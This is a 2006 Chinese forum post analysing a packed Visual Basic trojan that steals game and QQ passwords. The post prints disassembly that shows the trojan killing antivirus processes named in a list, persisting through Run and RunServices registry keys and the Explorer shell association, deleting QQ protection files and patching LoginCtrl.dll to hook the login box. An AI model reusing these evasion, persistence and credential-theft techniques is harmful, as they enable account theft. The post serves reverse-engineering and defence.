- UID
- 5364
注册时间2005-12-18
阅读权限10
最后登录1970-1-1
周游历练
该用户从未签到
|
【破文标题】某病毒分析
【破文作者】FoBnN
【作者邮箱】fobcrackgp[at]163.com
【作者主页】www.hack58.com
【破解工具】OD+LOPE+xxxxxxxxxxxxx
【破解平台】XP+SP2
【软件名称】某盗号程序,现在偶也不知道是啥
【软件大小】48K
【原版下载】
【保护方式】NSPACK
【软件简介】无
【破解声明】MD鄙视挂马之人,也要感谢他,没他挂马也没偶这篇分析!
------------------------------------------------------------------------
起因:
今天在网上寻找些学习资料,无意中打开一个站,没多少时间发现进程数达到87个,!!!!狂汗!!!.
查看源代码后发现被挂了吗,利用GOLDSUN写的ADO缺陷。
迅速断网重启.先用QQKAV,RAV查了一遍,发现黑防鸽子和GSERVERVIP2006。还有几个盗号的软件。RAV监视服务无法
启动又发先BAIGOO。CND。超级影吧等流氓软件泛滥一一除之.打开QQ发现NSPROTECT启动失败,但并未出现红叉.大事不妙.
①.
打开TACKMGER,发现有两个SMSS.exe。其中一个是以偶当前用户身份运行,并非SYSTEM。很可疑
===================================================================================
发现其在%windir%下,于是CTRL+C复制发现复制不了,拿出UE打开,然后保存.终于复制下来,结束进程。删除文件.
用PEID查看
看到区段为XXX1,XXX2,XXX3判断为NSPACK
===================================================================================
OD,esp定律,DUMP,修复,文件48K变为264K
00403644 > 68 6C394000 push dumped_.0040396C ;OEP
00403649 E8 F0FFFFFF call <jmp.&msvbvm50.ThunRTMain>
0040364E 0000 add byte ptr ds:[eax],al
00403650 0000 add byte ptr ds:[eax],al
00403652 0000 add byte ptr ds:[eax],al
00403654 3000 xor byte ptr ds:[eax],al
00403656 0000 add byte ptr ds:[eax],al
====================================================================================
②.因为发现是VB编写的程序,用GetVBRes载入分析资源,看看有没有关键信息.
晕死查看一下发现不少.如图1,图2,
====================================================================================
③用OD分析吧
00413567 E8 28FFFEFF call <jmp.&msvbvm50.rtcMsgBox> ;运行时这里会弹出迷惑性的提示
00414A3E /74 05 je short dumped_.00414A45
00414A40 |E9 552A0000 jmp dumped_.0041749A
00414A45 \C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
00414A4C E8 092F0000 call dumped_.0041795A ;这个CALL对杀软进行检测破坏
-----------
0041795A 55 push ebp
0041795B 8BEC mov ebp,esp
0041795D 83EC 18 sub esp,18
00417960 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler>
00417965 64:A1 00000000 mov eax,dword ptr fs:[0]
0041796B 50 push eax
0041796C 64:8925 0000000>mov dword ptr fs:[0],esp
00417973 B8 38050000 mov eax,538
00417978 E8 83B8FEFF call <jmp.&msvbvm50.__vbaChkstk>
0041797D 53 push ebx
0041797E 56 push esi
0041797F 57 push edi
00417980 8965 E8 mov dword ptr ss:[ebp-18],esp
00417983 C745 EC C01C400>mov dword ptr ss:[ebp-14],dumped_.00401CC0
0041798A 8365 F0 00 and dword ptr ss:[ebp-10],0
0041798E 8365 F4 00 and dword ptr ss:[ebp-C],0
00417992 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
00417999 C745 FC 0200000>mov dword ptr ss:[ebp-4],2
004179A0 6A FF push -1
004179A2 E8 81BAFEFF call <jmp.&msvbvm50.__vbaOnError>
004179A7 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
004179AE 6A 00 push 0
004179B0 6A 02 push 2
004179B2 E8 49DBFEFF call dumped_.00405500
004179B7 8985 54FDFFFF mov dword ptr ss:[ebp-2AC],eax
004179BD E8 0CBAFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004179C2 8B85 54FDFFFF mov eax,dword ptr ss:[ebp-2AC]
004179C8 8945 D8 mov dword ptr ss:[ebp-28],eax
004179CB C745 FC 0400000>mov dword ptr ss:[ebp-4],4
004179D2 C785 A4FDFFFF 2>mov dword ptr ss:[ebp-25C],128
004179DC C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004179E3 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-25C]
004179E9 50 push eax
004179EA 8D85 28FCFFFF lea eax,dword ptr ss:[ebp-3D8]
004179F0 50 push eax
004179F1 68 48534000 push dumped_.00405348
004179F6 E8 1DBBFEFF call <jmp.&msvbvm50.__vbaRecUniToAnsi>
004179FB 50 push eax
004179FC FF75 D8 push dword ptr ss:[ebp-28]
004179FF E8 3CDBFEFF call dumped_.00405540
00417A04 8985 54FDFFFF mov dword ptr ss:[ebp-2AC],eax
00417A0A E8 BFB9FEFF call <jmp.&msvbvm50.__vbaSetSystemError>
00417A0F 8D85 28FCFFFF lea eax,dword ptr ss:[ebp-3D8]
00417A15 50 push eax
00417A16 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-25C]
00417A1C 50 push eax
00417A1D 68 48534000 push dumped_.00405348
00417A22 E8 EBBAFEFF call <jmp.&msvbvm50.__vbaRecAnsiToUni>
00417A27 83BD 54FDFFFF 0>cmp dword ptr ss:[ebp-2AC],0
00417A2E 0F84 EE130000 je dumped_.00418E22
00417A34 C745 FC 0700000>mov dword ptr ss:[ebp-4],7
00417A3B 66:83A5 58FDFFF>and word ptr ss:[ebp-2A8],0
00417A43 8D85 58FDFFFF lea eax,dword ptr ss:[ebp-2A8]
00417A49 50 push eax
00417A4A 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238]
00417A50 50 push eax
00417A51 68 04010000 push 104
00417A56 E8 79B9FEFF call <jmp.&msvbvm50.__vbaStrFixstr>
00417A5B 8BD0 mov edx,eax
00417A5D 8D8D A0FDFFFF lea ecx,dword ptr ss:[ebp-260]
00417A63 E8 96B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A68 50 push eax
00417A69 E8 6591FFFF call dumped_.00410BD3
00417A6E 8BD0 mov edx,eax
00417A70 8D8D 9CFDFFFF lea ecx,dword ptr ss:[ebp-264]
00417A76 E8 83B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A7B FFB5 A0FDFFFF push dword ptr ss:[ebp-260]
00417A81 8D85 C8FDFFFF lea eax,dword ptr ss:[ebp-238]
00417A87 50 push eax
00417A88 68 04010000 push 104
00417A8D E8 36B9FEFF call <jmp.&msvbvm50.__vbaLsetFixstr>
00417A92 8B85 9CFDFFFF mov eax,dword ptr ss:[ebp-264]
00417A98 8985 E8FAFFFF mov dword ptr ss:[ebp-518],eax
00417A9E 83A5 9CFDFFFF 0>and dword ptr ss:[ebp-264],0
00417AA5 8B85 E8FAFFFF mov eax,dword ptr ss:[ebp-518]
00417AAB 8985 94FDFFFF mov dword ptr ss:[ebp-26C],eax
00417AB1 C785 8CFDFFFF 0>mov dword ptr ss:[ebp-274],8
00417ABB 8D85 8CFDFFFF lea eax,dword ptr ss:[ebp-274]
00417AC1 50 push eax
00417AC2 8D85 7CFDFFFF lea eax,dword ptr ss:[ebp-284]
00417AC8 50 push eax
00417AC9 E8 A0B8FEFF call <jmp.&msvbvm50.rtcUpperCaseVar>
00417ACE C785 64FDFFFF 7>mov dword ptr ss:[ebp-29C],dumped_.00408974 ; UNICODE "RAVMON.EXE" ;瑞星
00417BF5 C785 64FDFFFF 9>mov dword ptr ss:[ebp-29C],dumped_.00408990 ; UNICODE "TROJDIE*"
00417D1C C785 64FDFFFF A>mov dword ptr ss:[ebp-29C],dumped_.004089A8 ; UNICODE "KPOP*"
00417E43 C785 64FDFFFF B>mov dword ptr ss:[ebp-29C],dumped_.004089B8 ; UNICODE "CCENTER*"
00417F6A C785 64FDFFFF D>mov dword ptr ss:[ebp-29C],dumped_.004089D0 ; UNICODE "*ASSISTSE*"
00418084 C785 64FDFFFF E>mov dword ptr ss:[ebp-29C],dumped_.004089EC ; UNICODE "KPFW*"
004181AB C785 64FDFFFF F>mov dword ptr ss:[ebp-29C],dumped_.004089FC ; UNICODE "AGENTSVR*"
004182D2 C785 64FDFFFF 1>mov dword ptr ss:[ebp-29C],dumped_.00408A14 ; UNICODE "KV*" ;还有很多,一些强的都在了
=======================================================================================
004168F1 68 90864000 push dumped_.00408690 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Runservices"
004169D9 68 78864000 push dumped_.00408678 ; UNICODE "TProgram"
............................................................服务启动
00416666 /74 4A je short dumped_.004166B2
00416668 |C745 FC 6E00000>mov dword ptr ss:[ebp-4],6E
0041666F |6A 0E push 0E
00416671 |68 F4854000 push dumped_.004085F4 ; UNICODE "Explorer.exe 1"
00416676 |8D45 B4 lea eax,dword ptr ss:[ebp-4C]
00416679 |50 push eax
0041667A |E8 5BCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
0041667F |50 push eax
00416680 |6A 01 push 1
00416682 |6A 00 push 0
00416684 |68 E4854000 push dumped_.004085E4 ; UNICODE "Shell"
00416689 |8D45 B8 lea eax,dword ptr ss:[ebp-48]
0041668C |50 push eax
0041668D |E8 48CDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
00416692 |50 push eax
00416693 |FF75 CC push dword ptr ss:[ebp-34]
00416696 |E8 FDF1FEFF call dumped_.00405898
0041669B |E8 2ECDFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004166A0 |8D45 B4 lea eax,dword ptr ss:[ebp-4C]
004166A3 |50 push eax
004166A4 |8D45 B8 lea eax,dword ptr ss:[ebp-48]
004166A7 |50 push eax
004166A8 |6A 02 push 2
004166AA |E8 37CDFEFF call <jmp.&msvbvm50.__vbaFreeStrList>
004166AF |83C4 0C add esp,0C
004166B2 \C745 FC 7000000>mov dword ptr ss:[ebp-4],70
004166B9 8D45 CC lea eax,dword ptr ss:[ebp-34]
004166BC 50 push eax
004166BD 68 18864000 push dumped_.00408618 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"
004166C2 8D45 B8 lea eax,dword ptr ss:[ebp-48]
004166C5 50 push eax
004166C6 E8 0FCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004166CB 50 push eax
004166CC 68 02000080 push 80000002
004166D1 E8 FEF0FEFF call dumped_.004057D4
004166D6 8985 18FFFFFF mov dword ptr ss:[ebp-E8],eax
004166DC E8 EDCCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004166E1 33C0 xor eax,eax
004166E3 83BD 18FFFFFF 0>cmp dword ptr ss:[ebp-E8],0
004166EA 0F94C0 sete al
004166ED F7D8 neg eax
004166EF 66:8985 0CFFFFF>mov word ptr ss:[ebp-F4],ax
004166F6 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
004166F9 E8 06CDFEFF call <jmp.&msvbvm50.__vbaFreeStr>
004166FE 0FBF85 0CFFFFFF movsx eax,word ptr ss:[ebp-F4]
00416705 85C0 test eax,eax
00416707 0F84 D9010000 je dumped_.004168E6
0041670D C745 FC 7100000>mov dword ptr ss:[ebp-4],71
00416714 C785 58FFFFFF E>mov dword ptr ss:[ebp-A8],dumped_.004062E4
0041671E C785 50FFFFFF 0>mov dword ptr ss:[ebp-B0],8
00416728 8D95 50FFFFFF lea edx,dword ptr ss:[ebp-B0]
0041672E 8D4D 90 lea ecx,dword ptr ss:[ebp-70]
00416731 E8 CCCBFEFF call <jmp.&msvbvm50.__vbaVarDup>
00416736 8D45 90 lea eax,dword ptr ss:[ebp-70]
00416739 50 push eax
0041673A 68 2C010000 push 12C
0041673F 8D45 80 lea eax,dword ptr ss:[ebp-80]
00416742 50 push eax
00416743 E8 AECBFEFF call <jmp.&msvbvm50.rtcStringVar>
00416748 8D45 80 lea eax,dword ptr ss:[ebp-80]
0041674B 50 push eax
0041674C E8 35CCFEFF call <jmp.&msvbvm50.__vbaStrVarMove>
00416751 8BD0 mov edx,eax
00416753 8D4D D0 lea ecx,dword ptr ss:[ebp-30]
00416756 E8 A3CCFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041675B 8D45 80 lea eax,dword ptr ss:[ebp-80]
0041675E 50 push eax
0041675F 8D45 90 lea eax,dword ptr ss:[ebp-70]
00416762 50 push eax
00416763 6A 02 push 2
00416765 E8 0ACCFEFF call <jmp.&msvbvm50.__vbaFreeVarList>
0041676A 83C4 0C add esp,0C
0041676D C745 FC 7200000>mov dword ptr ss:[ebp-4],72
00416774 C785 14FFFFFF 2>mov dword ptr ss:[ebp-EC],12C
0041677E C785 18FFFFFF 0>mov dword ptr ss:[ebp-E8],1
00416788 8D85 14FFFFFF lea eax,dword ptr ss:[ebp-EC]
0041678E 50 push eax
0041678F FF75 D0 push dword ptr ss:[ebp-30]
00416792 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
00416795 50 push eax
00416796 E8 3FCCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
0041679B 50 push eax
0041679C 8D85 18FFFFFF lea eax,dword ptr ss:[ebp-E8]
004167A2 50 push eax
004167A3 6A 00 push 0
004167A5 68 78864000 push dumped_.00408678 ; UNICODE "TProgram"
004167AA 8D45 B8 lea eax,dword ptr ss:[ebp-48]
004167AD 50 push eax
004167AE E8 27CCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004167B3 50 push eax
004167B4 FF75 CC push dword ptr ss:[ebp-34]
004167B7 E8 9CF0FEFF call dumped_.00405858
004167BC 8985 10FFFFFF mov dword ptr ss:[ebp-F0],eax
004167C2 E8 07CCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004167C7 FF75 B4 push dword ptr ss:[ebp-4C]
004167CA 8D45 D0 lea eax,dword ptr ss:[ebp-30]
004167CD 50 push eax
004167CE E8 EFCBFEFF call <jmp.&msvbvm50.__vbaStrToUnicode>
004167D3 33C0 xor eax,eax
004167D5 83BD 10FFFFFF 0>cmp dword ptr ss:[ebp-F0],0
004167DC 0F95C0 setne al
004167DF F7D8 neg eax
004167E1 66:8985 0CFFFFF>mov word ptr ss:[ebp-F4],ax
004167E8 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
004167EB 50 push eax
004167EC 8D45 B8 lea eax,dword ptr ss:[ebp-48]
004167EF 50 push eax
004167F0 6A 02 push 2
004167F2 E8 EFCBFEFF call <jmp.&msvbvm50.__vbaFreeStrList>
004167F7 83C4 0C add esp,0C
004167FA 0FBF85 0CFFFFFF movsx eax,word ptr ss:[ebp-F4]
00416801 85C0 test eax,eax
00416803 0F84 DD000000 je dumped_.004168E6
00416809 C745 FC 7300000>mov dword ptr ss:[ebp-4],73
00416810 E8 072F0000 call dumped_.0041971C
00416815 8BD0 mov edx,eax
00416817 8D4D A0 lea ecx,dword ptr ss:[ebp-60]
0041681A E8 DFCBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041681F 8B45 A0 mov eax,dword ptr ss:[ebp-60]
00416822 8985 ECFEFFFF mov dword ptr ss:[ebp-114],eax
00416828 8365 A0 00 and dword ptr ss:[ebp-60],0
0041682C E8 EB2E0000 call dumped_.0041971C
00416831 8BD0 mov edx,eax
00416833 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
00416836 E8 C3CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041683B 50 push eax
0041683C 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE"
00416841 E8 9ACBFEFF call <jmp.&msvbvm50.__vbaStrCat>
00416846 8BD0 mov edx,eax
00416848 8D4D B0 lea ecx,dword ptr ss:[ebp-50]
0041684B E8 AECBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416850 50 push eax
00416851 E8 9CCBFEFF call <jmp.&msvbvm50.__vbaLenBstr>
00416856 50 push eax
00416857 8B95 ECFEFFFF mov edx,dword ptr ss:[ebp-114]
0041685D 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
00416860 E8 99CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416865 50 push eax
00416866 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE" 关联EXPLORER
00416A70 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE"
盗号之QQ篇.
004280EC 55 push ebp
004280ED 8BEC mov ebp,esp
004280EF 83EC 18 sub esp,18
004280F2 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler>
004280F7 64:A1 00000000 mov eax,dword ptr fs:[0]
004280FD 50 push eax
004280FE 64:8925 0000000>mov dword ptr fs:[0],esp
00428105 B8 C4000000 mov eax,0C4
0042810A E8 F1B0FDFF call <jmp.&msvbvm50.__vbaChkstk>
0042810F 53 push ebx
00428110 56 push esi
00428111 57 push edi
00428112 8965 E8 mov dword ptr ss:[ebp-18],esp
00428115 C745 EC 382C400>mov dword ptr ss:[ebp-14],dumped_.00402C38
0042811C 8365 F0 00 and dword ptr ss:[ebp-10],0
00428120 8365 F4 00 and dword ptr ss:[ebp-C],0
00428124 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
0042812B 8B55 08 mov edx,dword ptr ss:[ebp+8]
0042812E 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00428131 E8 D4B2FDFF call <jmp.&msvbvm50.__vbaStrCopy>
00428136 68 649F4000 push dumped_.00409F64
0042813B 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
0042813E 50 push eax
0042813F E8 A0B1FDFF call <jmp.&msvbvm50.__vbaAryConstruct>
00428144 C745 FC 0200000>mov dword ptr ss:[ebp-4],2
0042814B 6A FF push -1
0042814D E8 D6B2FDFF call <jmp.&msvbvm50.__vbaOnError>
00428152 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
00428159 68 DC9E4000 push dumped_.00409EDC ; UNICODE "0000010001000C0C000001000800E804"
0042815E E8 8690FEFF call dumped_.004111E9
00428163 8BD0 mov edx,eax
00428165 8D4D AC lea ecx,dword ptr ss:[ebp-54]
00428168 E8 91B2FDFF call <jmp.&msvbvm50.__vbaStrMove>
0042816D C745 FC 0400000>mov dword ptr ss:[ebp-4],4
00428174 FF75 D4 push dword ptr ss:[ebp-2C]
00428177 68 249F4000 push dumped_.00409F24 ; UNICODE "\qqpnpp.sys" 弹出"qqpnpp.sys"
0042817C E8 5FB2FDFF call <jmp.&msvbvm50.__vbaStrCat> ;挑到到QQ安装目录
00428181 8945 94 mov dword ptr ss:[ebp-6C],eax
00428184 C745 8C 0800000>mov dword ptr ss:[ebp-74],8
0042818B 8D45 8C lea eax,dword ptr ss:[ebp-74]
0042818E 50 push eax
0042818F E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ;删除文件
00428194 8D4D 8C lea ecx,dword ptr ss:[ebp-74]
00428197 E8 F6B1FDFF call <jmp.&msvbvm50.__vbaFreeVar>
0042819C C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004281A3 E8 7AB2FDFF call <jmp.&msvbvm50.rtcDoEvents> ;循环
004281A8 C745 FC 0600000>mov dword ptr ss:[ebp-4],6
004281AF FF75 D4 push dword ptr ss:[ebp-2C]
004281B2 68 389E4000 push dumped_.00409E38 ; UNICODE "\npkcrypt.vxd" 弹出"npkcrypt.vxd"
004281B7 E8 24B2FDFF call <jmp.&msvbvm50.__vbaStrCat> ;挑到到QQ安装目录
004281BC 8BD0 mov edx,eax
004281BE 8D4D A0 lea ecx,dword ptr ss:[ebp-60]
004281C1 E8 38B2FDFF call <jmp.&msvbvm50.__vbaStrMove>
004281C6 50 push eax
004281C7 E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ;删除文件
--------------------------------------------------------------------------------------
0042832A 8D45 9C lea eax,dword ptr ss:[ebp-64]
0042832D 50 push eax
0042832E E8 E3B0FDFF call <jmp.&msvbvm50.__vbaObjSet>
00428333 8985 24FFFFFF mov dword ptr ss:[ebp-DC],eax
00428339 8B85 24FFFFFF mov eax,dword ptr ss:[ebp-DC]
0042833F 8B00 mov eax,dword ptr ds:[eax]
00428341 FFB5 24FFFFFF push dword ptr ss:[ebp-DC]
00428347 FF50 48 call dword ptr ds:[eax+48]
0042834A 8D4D 9C lea ecx,dword ptr ss:[ebp-64]
0042834D E8 BEB0FDFF call <jmp.&msvbvm50.__vbaFreeObj>
00428352 C745 FC 0D00000>mov dword ptr ss:[ebp-4],0D
00428359 FF75 D4 push dword ptr ss:[ebp-2C]
0042835C 68 409F4000 push dumped_.00409F40 ; UNICODE "\LoginCtrl.dll"
00428361 E8 7AB0FDFF call <jmp.&msvbvm50.__vbaStrCat>
00428366 8BD0 mov edx,eax
00428368 8D4D A4 lea ecx,dword ptr ss:[ebp-5C]
0042836B E8 8EB0FDFF call <jmp.&msvbvm50.__vbaStrMove>
00428370 50 push eax
00428371 6A 21 push 21
00428373 6A FF push -1
00428375 68 20100000 push 1020
0042837A E8 EBB0FDFF call <jmp.&msvbvm50.__vbaFileOpen> ;打开文件
0042837F 8D4D A4 lea ecx,dword ptr ss:[ebp-5C]
00428382 E8 7DB0FDFF call <jmp.&msvbvm50.__vbaFreeStr>
00428387 C745 FC 0E00000>mov dword ptr ss:[ebp-4],0E
0042838E E8 8FB0FDFF call <jmp.&msvbvm50.rtcDoEvents> ;交给系统
00428393 C745 FC 0F00000>mov dword ptr ss:[ebp-4],0F
0042839A C745 94 0400028>mov dword ptr ss:[ebp-6C],80020004
004283A1 C745 8C 0A00000>mov dword ptr ss:[ebp-74],0A
004283A8 8D45 8C lea eax,dword ptr ss:[ebp-74]
004283AB 50 push eax
004283AC E8 69AFFDFF call <jmp.&msvbvm50.rtcRandomize>
004283B1 8D4D 8C lea ecx,dword ptr ss:[ebp-74]
004283B4 E8 D9AFFDFF call <jmp.&msvbvm50.__vbaFreeVar>
004283B9 ^ E9 C9FEFFFF jmp dumped_.00428287
004283BE C745 FC 1100000>mov dword ptr ss:[ebp-4],11
004283C5 C645 B0 01 mov byte ptr ss:[ebp-50],1
004283C9 C745 FC 1200000>mov dword ptr ss:[ebp-4],12
004283D0 6A 21 push 21
004283D2 E8 7DB1FDFF call <jmp.&msvbvm50.rtcFileLength> ;读取文件长度
004283D7 8985 44FFFFFF mov dword ptr ss:[ebp-BC],eax
004283DD C785 48FFFFFF 0>mov dword ptr ss:[ebp-B8],1000
004283E7 C745 DC 0000010>mov dword ptr ss:[ebp-24],10000 ; UNICODE "=::=::\" 比较
004283EE EB 0C jmp short dumped_.004283FC
004283F0 8B45 DC mov eax,dword ptr ss:[ebp-24]
004283F3 0385 48FFFFFF add eax,dword ptr ss:[ebp-B8]
004283F9 8945 DC mov dword ptr ss:[ebp-24],eax
004283FC 8B45 DC mov eax,dword ptr ss:[ebp-24]
004283FF 3B85 44FFFFFF cmp eax,dword ptr ss:[ebp-BC] 上面对LoginCtrl.dll进行修改,不出现红插
=============================================================================
00427E93 /0F84 95000000 je dumped_.00427F2E
00427E99 |8D45 08 lea eax,dword ptr ss:[ebp+8]
00427E9C |50 push eax
00427E9D |E8 C5000000 call dumped_.00427F67
00427EA2 |8BD0 mov edx,eax
00427EA4 |8D4D D8 lea ecx,dword ptr ss:[ebp-28]
00427EA7 |E8 52B5FDFF call <jmp.&msvbvm50.__vbaStrMove>
00427EAC |FF75 D8 push dword ptr ss:[ebp-28]
00427EAF |68 CC9E4000 push dumped_.00409ECC ; UNICODE "Edit" ;QQ登入框上的控件
00427EB4 |E8 03B5FDFF call <jmp.&msvbvm50.__vbaStrCmp> ;比较
00427EB9 |85C0 test eax,eax
00427EBB |75 76 jnz short dumped_.00427F33
00427EBD |FF75 08 push dword ptr ss:[ebp+8]
00427EC0 |E8 B3EAFDFF call dumped_.00406978
00427EC5 |8BF0 mov esi,eax
00427EC7 |E8 02B5FDFF call <jmp.&msvbvm50.__vbaSetSystemError>
00427ECC |8D45 CC lea eax,dword ptr ss:[ebp-34]
00427ECF |50 push eax
00427ED0 |8975 CC mov dword ptr ss:[ebp-34],esi
00427ED3 |E8 8F000000 call dumped_.00427F67
00427ED8 |8BD0 mov edx,eax
00427EDA |8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00427EDD |E8 1CB5FDFF call <jmp.&msvbvm50.__vbaStrMove>
00427EE2 |50 push eax
00427EE3 |68 60674000 push dumped_.00406760 ; UNICODE "#32770" ;QQ登入框
00427EE8 |E8 CFB4FDFF call <jmp.&msvbvm50.__vbaStrCmp> ;比较
==========================================================================
太累了就先暂停到这里,
发现程序还可以盗WOW,梦友,联众.并且有个黑名单,杀软都在里面。用服务启动,在注册表也有藏匿。关联EXPLORER.
对WOW,梦幻等升级程序进行破解,让它不能升级.
------------------------------------------------------------------------
还是第一次看到这样的盗号软件,用VB写的这么多功能.
------------------------------------------------------------------------
【版权声明】BY FoBnN qq:380838221 |
|
IP卡
发表于 2006-8-8 15:07:46
提升卡
置顶卡
变色卡
千斤顶
显身卡
楼主
发表于 2006-8-8 22:14:55
发表于 2006-8-9 11:02:31
发表于 2006-8-9 17:16:30